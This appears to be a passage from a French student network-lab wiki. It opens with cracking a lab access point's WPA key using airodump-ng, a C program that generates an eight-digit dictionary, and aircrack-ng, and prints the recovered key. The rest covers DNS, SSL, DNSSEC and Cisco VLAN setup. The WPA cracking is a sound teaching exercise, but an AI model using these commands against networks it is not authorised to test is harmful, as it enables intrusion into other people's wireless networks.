- Un fichier d'échange contenant le handshake &amp;lt;br /&amp;gt;&lt;br /&gt;
- Un dictionnaire contenant toutes les possibilités de valeur que peut avoir la clé.  &lt;br /&gt;
&lt;br /&gt;
Ici nous avons simplement récupéré le handshake grâce à la commande d'écoute de la borne :&lt;br /&gt;
&amp;lt;pre&amp;gt;  airodump-ng -w out --encrypt wpa -c 13 --04 :DA :D2 :9C :50 :55  wlan0 &amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Grâce à l'option -w out, il nous a créée un fichier stockant le hanshake. &lt;br /&gt;
&lt;br /&gt;
En parallèle nous avons généré le fichier txt jouant le rôle de dictionnaire, à l'aide d'un programme C. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
int main(){&lt;br /&gt;
	FILE *fp=fopen(&amp;quot;dico.txt&amp;quot;,&amp;quot;w+&amp;quot;);&lt;br /&gt;
	int i =0;&lt;br /&gt;
	for(i=0;i&amp;lt;=99999999;i++){&lt;br /&gt;
		fprintf(fp,&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
	}&lt;br /&gt;
	return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Finalement on utilise l'utilitaire aircrack avec en paramètre le fichier de sauvegarde contenant le handshake ainsi que le fichier texte dictionnaire :&lt;br /&gt;
&amp;lt;pre&amp;gt;  aircrack-ng -w dico.txt dump-02.cap &amp;lt;/pre&amp;gt;&lt;br /&gt;
On obtient avec succès au bout de quelque minutes : &lt;br /&gt;
&amp;lt;pre&amp;gt; &lt;br /&gt;
Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [01:01:47] 12399904 keys tested (3519.77 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399907 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : F5 4A 19 53 7C DB 88 D1 D0 21 3B FD FF 5F EF CD &lt;br /&gt;
                       D0 DE 05 F5 0F DB 08 79 85 16 17 8B E0 E4 6B 23 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 25 94 12 1B 71 2C 49 01 10 44 34 8A 8A 74 36 47 &lt;br /&gt;
                       7B 1C D8 3D 77 A5 9B 9D 74 44 DC C7 5F 55 D7 0B &lt;br /&gt;
                       2B 29 83 CC FC 08 7E DF BF A6 B7 76 AF BA D5 8A &lt;br /&gt;
                       07 F0 61 B1 02 3A 56 B2 A2 03 CD 80 20 14 3E D8 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : CF 04 96 3D DC 43 B4 D1 0E D5 0F B5 78 2F 57 C9 &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
=====Configuration DNS=====&lt;br /&gt;
Dans un premier temps, nous réservons sur Gandi notre nom de domaine : speedflash.space&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous installons les paquets bind9, ainsi que apache2.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous configurons les fichiers nécessaires à la bonne marche du serveur DNS à savoir les fichiers named.conf.local (autorisation de transfert de paquets vers le DNS esclave - Utilisation du bon fichier de zone), puos db.speedflash.space (fichier de zone)&amp;lt;br /&amp;gt;&lt;br /&gt;
Voici la configuration de ces 2 fichiers :&amp;lt;br /&amp;gt;&lt;br /&gt;
named.conf.local :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;zone &amp;quot;speedflash.space&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        file &amp;quot;/etc/bind/db.speedflash.space&amp;quot;;&lt;br /&gt;
        allow-transfer {217.70.177.40;};&lt;br /&gt;
};&amp;lt;/pre&amp;gt;&lt;br /&gt;
217.70.177.40 est l'adresse IP du serveur DNS de Gandi (ns6.gandi.net) que nous avons pris pour serveur esclave.&amp;lt;br /&amp;gt;&lt;br /&gt;
db.speedflash.space:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;;&lt;br /&gt;
; BIND data file for local loopback interface&lt;br /&gt;
;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.speedflash.space. root.speedflash.space (&lt;br /&gt;
                              2         ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
        IN      NS      ns.speedflash.space.&lt;br /&gt;
ns      IN      A       193.48.57.165&lt;br /&gt;
www     IN      A       193.48.57.165&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous déclarons que notre DNS (ns) est à l'adresse 193.48.57.165, soit l'IP de notre VM.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, pour faire fonctionner le tout, on relance bind : &amp;lt;pre&amp;gt; service bind9 restart &amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Et à l'aide du fichier de log daemon.log, on peut confirmer que bind s'est lancé sans erreur :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;tail /var/log/daemon.log | grep named&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: command channel listening on ::1#953&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: journal file is out of date: removing journal file&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: managed-keys-zone: loaded serial 3&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 0.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone speedflash.space/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 127.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone 255.in-addr.arpa/IN: loaded serial 1&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: zone localhost/IN: loaded serial 2&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: all zones loaded&lt;br /&gt;
Nov 17 11:52:37 Flash named[1798]: running&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Securisation de site par SSL=====&lt;br /&gt;
Afin d'obtenir un certificat SSL par Gandi, nous avons besoin d'un CSR. Nous générons donc le CSR par la commande :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;openssl req -nodes -newkey rsa:2048 -sha1 -keyout serveur.key -out serveur.csr&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous fournissons ce CSR à Gandi, puis nous attendons d'avoir notre certificat. Une fois le certificat obtenu, on peut copier les bons fichiers dans SSL :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# cp certificat.crt /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
root@Flash:/etc/bind# cp serveur.key /etc/ssl/private/speedflash.space.key&lt;br /&gt;
root@Flash:/etc/bind# cp GandiStandardSSLCA.pem /etc/ssl/certs/GandiStandardSSLCA.pem&amp;lt;/pre&amp;gt;&lt;br /&gt;
GandiStandardSSLCA.pem est un certificat intermédiaire afin de certifier notre certificat.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, nous re-hashons toute la structure afin de prendre en compte notre certificat :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@Flash:/etc/bind# c_rehash /etc/ssl/certs&lt;br /&gt;
Doing /etc/ssl/certs&lt;br /&gt;
speedflash.space.crt =&amp;gt; ac112f31.0&lt;br /&gt;
speedflash.space.crt =&amp;gt; a88e5e47.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 0cad7ee9.0&lt;br /&gt;
GandiStandardSSLCA.pem =&amp;gt; 3a57595e.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; 816e77e4.0&lt;br /&gt;
ssl-cert-snakeoil.pem =&amp;gt; de4674a3.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut modifier le fichier 000-speedflash.space-ssl.conf afin d'associer APACHE et notre nom de serveur : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;NameVirtualHost *:443&lt;br /&gt;
        &amp;lt;VirtualHost 193.48.57.165:443&amp;gt;&lt;br /&gt;
                ServerName www.speedflash.space&lt;br /&gt;
                ServerAlias speedflash.space&lt;br /&gt;
                DocumentRoot /var/www/www.speedflash.space/&lt;br /&gt;
                CustomLog /var/log/apache2/secure_acces.log combined&lt;br /&gt;
&lt;br /&gt;
                SSLEngine on&lt;br /&gt;
                SSLCertificateFile /etc/ssl/certs/speedflash.space.crt&lt;br /&gt;
                SSLCertificateKeyFile /etc/ssl/private/speedflash.space.key&lt;br /&gt;
                SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA.pem&lt;br /&gt;
                SSLVerifyClient None&lt;br /&gt;
        &amp;lt;/VirtualHost&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
Il faut activer le module SSL de Apache : &amp;lt;pre&amp;gt; a2modssl&amp;lt;/pre&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons donc activer notre Apache avec notre certificat : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# a2ensite 000-speedflash.space-ssl.conf &lt;br /&gt;
Enabling site 000-speedflash.space-ssl.&lt;br /&gt;
root@Flash:/etc/bind# service apache2 reload&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous pouvons vérifier que le site est sécurisé en allant sur https://www.speedflash.space et en voyant le cadenas vert.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Securisation de DNS par DNSSEC=====&lt;br /&gt;
Il faut générer les clés .key et .private afin de pouvoir signer les zones et les enregistrements.&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 2048 -f KSK -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE speedflash.space &amp;lt;/pre&amp;gt;&lt;br /&gt;
l'option -r /dev/urandom est ici pour accélérer la génération des clés &amp;lt;br /&amp;gt;&lt;br /&gt;
Nous incluons les clés dans le fichier de zone db.speedflash.space : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;$include /etc/bind/speedflash.space.dnssec/speedflash.space-ksk.key&lt;br /&gt;
$include /etc/bind/speedflash.space.dnssec/speedflash.space-zsk.key&amp;lt;/pre&amp;gt;&lt;br /&gt;
On signe donc la zone : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind/speedflash.space.dnssec# dnssec-signzone -o speedflash.space -k speedflash.space-ksk ../db.speedflash.space speedflash.space-zsk&lt;br /&gt;
Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
Zone fully signed:&lt;br /&gt;
Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
../db.speedflash.space.signed&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On ajoute le DNSSEC à Gandi : &amp;lt;br /&amp;gt;&lt;br /&gt;
[[Dns-gandi.png]]&amp;lt;br /&amp;gt;&lt;br /&gt;
On vérifie que notre DNS est bien sécurisé en essayant la commande : &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;root@Flash:/etc/bind# dig DNSKEY speedflash.space @localhost&lt;br /&gt;
&lt;br /&gt;
; &amp;lt;&amp;lt;&amp;gt;&amp;gt; DiG 9.9.5-9+deb8u8-Debian &amp;lt;&amp;lt;&amp;gt;&amp;gt; DNSKEY speedflash.space @localhost&lt;br /&gt;
;; global options: +cmd&lt;br /&gt;
;; Got answer:&lt;br /&gt;
;; -&amp;gt;&amp;gt;HEADER&amp;lt;;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 1&lt;br /&gt;
&lt;br /&gt;
;; OPT PSEUDOSECTION:&lt;br /&gt;
; EDNS: version: 0, flags:; udp: 4096&lt;br /&gt;
;; QUESTION SECTION:&lt;br /&gt;
;speedflash.space.        IN    DNSKEY&lt;br /&gt;
&lt;br /&gt;
;; ANSWER SECTION:&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    257 3 5 AwEAAaJcjim9pdD8U6InsiCNFzJthDwsiwGgPylxRp5nDuoaGrcDp1LU psBv0iY0VUqzcC+uRhTTfjl6P3yuPsnZYefVlSEeRpn9QR33Hioadbhc aFSuYnfwS/L/R6Kwt2XFz5V/fI/j+M2AtGxhBFgVKtmjvnwEr2VfdkFl d9AZJQu09ajWCJIKeL2dRE5bPbXwkDilgkQkBZUVWtXN7qwnrFnlszpb gSdRKosfhScAUmTerxOV6WybzOYb+9D0r8QrDoIhhCpf1/gczAUzHPWd hb0rxIGHk6seMp1qTotZE3SgxrCwm7H6z4pcXeMfbdNzkrIgcJmum9i0 zsLzlghkAPM=&lt;br /&gt;
speedflash.space.    604800    IN    DNSKEY    256 3 5 AwEAAcHrx5vtsGzY7LF32x3HRIXRwOBm3WZM02NHY4s0uB2djn6tV52B ss78iXC4O5hdpJ0uOxS0/MNCYNJkIXnWsvAHc6lbdWfQ8Jvnj/aBMz94 agXbxXkseqjlIcF1huspBAi9lcY5hsy59MDek5iNlduy8HK6AVItqeQi HviShcq3&amp;lt;/pre&amp;gt;&lt;br /&gt;
On remarque bien la présence de DNSKEY qui nous assure que notre DNS est sécurisé.&amp;lt;br /&amp;gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Dns-gandi.png&amp;diff=35250</id>
		<title>Fichier:Dns-gandi.png</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Fichier:Dns-gandi.png&amp;diff=35250"/>
				<updated>2016-11-18T07:45:01Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Troj</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35249</id>
		<title>Cahier 2016 groupe n°5</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B05&amp;diff=35249"/>
				<updated>2016-11-18T07:44:00Z</updated>
		
		<summary type="html">&lt;p&gt;Troj : /* Présentation du travail */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Cahier des charges ==&lt;br /&gt;
=== Présentation du travail ===&lt;br /&gt;
&lt;br /&gt;
==== Répartition du travail ====&lt;br /&gt;
&lt;br /&gt;
 {| class=&amp;quot;wikitable alternance centre&amp;quot;&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 1 (03/10)&lt;br /&gt;
 | Recherche sur le routeur 4331. Installation de la machine virtuelle, définition de l'architecture réseau. &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 2 (10/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |- &lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 3 (13/10)&lt;br /&gt;
 | Création des VLAN - Bridge&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 4 (24/10)&lt;br /&gt;
 | Test de la configuration locale&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 5 (07/11)&lt;br /&gt;
 | Configuration OSPF - Configuration locale IPv6 - Configuration RIP - Configuration VRRP - Cassage de clé WEP&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 6 (17/11 - additionnel)&lt;br /&gt;
 | Protocole HSRP - Cassage de clé WPA - Configuration DNS - Securisation de site par SSL - Securisation de DNS par DNSSEC - LVM/RAID5&lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 7 (28/11)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 ! scope=&amp;quot;row&amp;quot; | Séance 8 (12/12)&lt;br /&gt;
 | &lt;br /&gt;
 |-&lt;br /&gt;
 |}&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 1ère semaine ====&lt;br /&gt;
&lt;br /&gt;
Pour cette première séance nous avons d'abord installé la machine virtuelle Xen grâce à la commande :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
xen-create-image --hostname=Flash --ip=193.48.57.165 --netmask=255.255.255.240 gateway=193.48.57.171 &lt;br /&gt;
--dir=/usr/local/xen --mirror=http://debian.polytech-lille.fr/debian/ --dist=jessie --passwd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous obtenons ce résultat:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Installation Summary&lt;br /&gt;
---------------------&lt;br /&gt;
Hostname        :  Flash&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:49:8F:E5&lt;br /&gt;
IP Address(es)  :  193.48.57.165 &lt;br /&gt;
RSA Fingerprint :  5c:89:1c:49:cf:d1:a0:a3:9b:ff:0c:d1:f7:33:82:db&lt;br /&gt;
Root Password   :  N/A&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Travail réalisé la 2e semaine (2 séances) ====&lt;br /&gt;
Durant cette semaine, nous avons réalisés la configuration locale du routeur (configuration des VLANs). &amp;lt;br /&amp;gt;&lt;br /&gt;
Comme le 4331 est une nouvelle génération de routeur encore non utilisée en TP de PRA, nous devons apprendre comment l'utiliser.&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Configuration générale=====&lt;br /&gt;
Communication: '''Série 9800 Bauds 8 bits sans parité sans contrôle de flux'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Lors de sa première mise en route, nous devons effectuer sa configuration générale :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; hostname cisco config hostname&lt;br /&gt;
 enable secret reverse &amp;lt;/pre&amp;gt;&lt;br /&gt;
Puis ensuite, nous pouvons passer à la configuration des VALNs.&lt;br /&gt;
=====Configuration des VLANs =====&lt;br /&gt;
Nous avons 12 VLANs à configurer :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 11 VLANs (2-11) : VLAN correspondant aux différents groupes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (12) : VLAN des Machines virtuelles. Permet la communication entre Cordouan et les Commutateurs&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; 1 VLAN (13) : VLAN d'interconnexion. Permet la communication entre le routeur local et le routeur de l'école&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
Sur l'interface physique du 4331, il y a 3 interfaces:&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/0 : disponible en cuivre et en fibre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/1: disponible en cuivre&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt; Gi 0/0/2: disponible en fibre&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons connecter notre routeur aux 2 commutateurs 6006 prévus dans l'architecture du TP. Pour cela, il faut que les 2 commutateurs aient les mêmes informations. Pour cela, nous devons créer des '''bridge-domain'''. Des bridge-domain permettent de rassembler 2 sous interfaces de 2 interfaces différentes pour qu'elles aient la même IP. L'interface principale n'aura pas d'adresse IP, les sous interfaces non plus, l'adresse IP sera placé sur le bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Exemple: '''VLAN2 : Gi 0/0/0.2 et Gi 0/0/1.2 seront dans le même bridge-domain 2'''&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Les 4331 étant une nouvelle génération de routeur encore non testée à l'école, il fallait apprendre à s'en servir.&amp;lt;br /&amp;gt;&lt;br /&gt;
La plupart des commandes CISCO de base restent inchangées. Cependant, la création des sous interfaces a changée. Avant, nous devions créer des interfaces comme suit:&lt;br /&gt;
&amp;lt;pre&amp;gt; interface GigabitEthernet 0/0/0.X &amp;lt;/pre&amp;gt;&lt;br /&gt;
Avec le nouvel IOS (IOS ISR), nous ne pouvons pas créer des sous interfaces comme ci-dessus dans le but de les mettre dans un bridge.&lt;br /&gt;
Nous devons passer par une nouvelle commande qui s'appelle '''service instance''' :&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi 0/0/0&lt;br /&gt;
 service instance &amp;lt;n°VLAN&amp;gt; ethernet &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nous avons la sous interface numéro 2 de l'interface principale 0/0/0.&amp;lt;br /&amp;gt;&lt;br /&gt;
Nous pouvons alors créer nous sous interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/0&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
&lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
    encapsulation dot1q 3&lt;br /&gt;
    bridge-domain 3&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; int gi0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negociation auto&lt;br /&gt;
  service instance 2 ethernet&lt;br /&gt;
    encapsulation dot1q 2&lt;br /&gt;
    bridge-domain 2&lt;br /&gt;
...&amp;lt;/pre&amp;gt;&lt;br /&gt;
Ainsi, nos sous interfaces sont crées et sont placés dans les différents bridge domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=====Configuration des bridge-domain=====&lt;br /&gt;
Afin d'allouer des IP aux différents bridge domain, il faut prévenir le routeur que nous utilisons des bridge-domain:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge irb &amp;lt;/pre&amp;gt;&lt;br /&gt;
Ensuite, nous devons préciser quel protocole nous devons utiliser et si les adresses IP des bridge domain seront des adresses routées :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt; bridge 2 protocol ieee&lt;br /&gt;
 bridge 2 route ip&amp;lt;/pre&amp;gt;&lt;br /&gt;
Enfin, nous pouvons allouer des IP aux différents bridge domain :&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;int BDI2&lt;br /&gt;
  ip address 10.60.2.1 255.255.255.0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Et nous répétons ces opérations pour tous les bridge-domain.&amp;lt;br /&amp;gt;&lt;br /&gt;
Afin de tester si notre configuration locale est correcte, nous devons racker notre routeur, le connecter à un des 6006, puis connecter le 6006 à Cordouan (groupe BONDING). Ainsi, nous pourrons voir si nous pouvons ping notre routeur depuis notre VM.&lt;br /&gt;
&lt;br /&gt;
====Travail réalisé la 3e semaine====&lt;br /&gt;
=====Test 1=====&lt;br /&gt;
Cette semaine, nous avons testés la configuration locale de notre routeur. Nous avons donc tentés de ping le routeur depuis notre VM. &amp;lt;br /&amp;gt;&lt;br /&gt;
Pour tester, nous avons besoin d'un port disponible sur CORDOUAN qui est dans le bridge IMA5sc.&amp;lt;br /&amp;gt;&lt;br /&gt;
Après des essais laborieux, nous décidons donc de regarder les adresses MAC des ports afin de les rassembler. Si 4 ports ont le même radical MAC, c'est qu'ils font partis d'un groupe de 4. Nous avons donc choisis '''eth4'''.&amp;lt;br /&amp;gt;&lt;br /&gt;
Ensuite, il fallait trouver le port physique correspondant a eth4. '''Grâce au fichier /etc/udev/rules.d/70-persistence-net.rules''', on peut voir l'association du port physique à l'interface. Voici l'extrait qui nous intéresse: &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;# PCI device 0x14e4:0x1657 (tg3)&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:40&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth4&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:41&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth5&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:42&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth6&amp;quot;&lt;br /&gt;
SUBSYSTEM==&amp;quot;net&amp;quot;, ACTION==&amp;quot;add&amp;quot;, DRIVERS==&amp;quot;?*&amp;quot;, ATTR{address}==&amp;quot;00:0a:f7:54:36:43&amp;quot;, ATTR{dev_id}==&amp;quot;0x0&amp;quot;, ATTR{type}==&amp;quot;1&amp;quot;, KERNEL==&amp;quot;eth*&amp;quot;, NAME=&amp;quot;eth7&amp;quot;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
On voit bien que eth4 est dans un groupe de 4 ports, ce qui restreint nos choix. Ensuite, on sait que c'est le plus petit des 4 interfaces. Logiquement, ce sera le 1er du groupe.&amp;lt;br /&amp;gt;&lt;br /&gt;
On connecte donc ce port au commutateur sur un port qui appartient au VLAN des VM. On connecte ensuite notre routeur au commutateur via un port trunk.&amp;lt;br /&amp;gt;&lt;br /&gt;
'''Premier essai: FAIL'''&amp;lt;br /&amp;gt;&lt;br /&gt;
=====Test 2=====&lt;br /&gt;
Et là, c'est le drame ... On ne ping rien ...&amp;lt;br /&amp;gt;&lt;br /&gt;
On se demande donc d'où cela peut venir.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Première cause possible : La configuration de CORDOUAN======&lt;br /&gt;
Peut-être que c'est CORDOUAN qui est mal configuré. On se place donc sur CORDOUAN, et grâce à la commande '''cdpr''' (Cisco Discovery Protocol Reporter), on peut demander au serveur de chercher ses voisins et d'avoir la configuration de la liaison avec ce voisin. Voici le résultat de cette commande:&amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;cdpr -d eth4&lt;br /&gt;
cdpr - Cisco Discovery Protocol Reporter&lt;br /&gt;
Version 2.4&lt;br /&gt;
Copyright (c) 2002-2010 - MonkeyMental.com&lt;br /&gt;
&lt;br /&gt;
Using Device: eth4&lt;br /&gt;
Warning opening device (eth4: no IPv4 address assigned)&lt;br /&gt;
Waiting for CDP advertisement:&lt;br /&gt;
(default config is to transmit CDP packets every 60 seconds)&lt;br /&gt;
Device ID&lt;br /&gt;
  value:  Switch_E306&lt;br /&gt;
Addresses&lt;br /&gt;
Port ID&lt;br /&gt;
  value:  GigabitEthernet4/13&amp;lt;/pre&amp;gt;&lt;br /&gt;
On voit bien que CORDOUAN détecte qu'il a une liaison avec le switch qui se trouve en E306 et qu'il est connecté via le port Gi4/13.&amp;lt;br /&amp;gt;&lt;br /&gt;
======Deuxième cause possible: Le commutateur======&lt;br /&gt;
Peut-être donc que c'est le commutateur qui est mal configuré. On se place donc sur le commutateur, et toujours grâce à la commande '''cdpr''', on peut demander au commutateur de trouver ses voisins. Le résultat de cette commande est la suivante: Le commutateur découvre bien notre routeur (cisco), et sait qu'il est connecté sur le port 4/47 (port trunk).&lt;br /&gt;
======Dernière cause possible:Le routeur======&lt;br /&gt;
On se dit donc que le problème vient du routeur...&amp;lt;br /&amp;gt;&lt;br /&gt;
On regarde donc la configuration du routeur, et Mr REDON nous demande pourquoi on n'a pas créé de VLAN. Les VLAN sont traduits par les service instance dans le nouvel IOS, mais peut-être que nous devons encore définir que les paquets venant/sortant de l'interface générale doivent être encapsulé/décapsulé en DOT1Q.&amp;lt;br /&amp;gt;&lt;br /&gt;
